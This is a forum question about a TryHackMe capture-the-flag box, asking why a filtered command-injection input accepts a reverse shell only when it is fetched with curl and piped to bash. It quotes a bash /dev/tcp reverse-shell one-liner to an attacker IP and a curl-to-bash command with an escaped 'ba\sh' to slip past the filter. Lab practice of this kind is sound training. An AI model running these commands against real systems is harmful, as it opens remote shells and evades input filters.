
So I'm doing some pentesting in a TryHackMe box (Chill Hack) and I've come to some trouble. In this box I have available an input in a website where I can inject commands to the vulnerable system.

This input has filters, so I cannot use bash or netcat without escaping the command characters.

Messing around, I tried getting a reverse shell by using that input with netcat, of course escaped so the command should work.

The problem is the direct command does not work. Checking the walkthrough, I've seen that the solution is to prepare a Bash shell (`bash -i >& /dev/tcp/10.0.0.1/8080 0>&1`), set up a web server and curl my attacking machine in order to pipe it to the bash command (something like this: `curl 10.9.223.50/shell.sh | ba\sh`).

Doing so provides me with a webshell.

The thing I don't understand is: why, when I use the exact same command (the Bash shell) in the input and escape the characters to avoid any problem with it, does the command not work, but it does work when piping it through the curl command?

alex55132
  • You already know the answer: `This input has filters...` The curl command bypasses filters that the direct bash one-liner does not. The question is what kind of filters you are dealing with, and the shell will help you with that. – ThoriumBR Jan 14 '21 at 00:22
  • Yeah, but the filters can be bypassed by escaping the characters of the command, which I've already done to create the reverse shell. It makes no sense to me that it lets me pipe the output from the shell.sh to bash, since bash is filtered, and that works, but it doesn't work using the command individually @ThoriumBR – alex55132 Jan 14 '21 at 08:19

0 Answers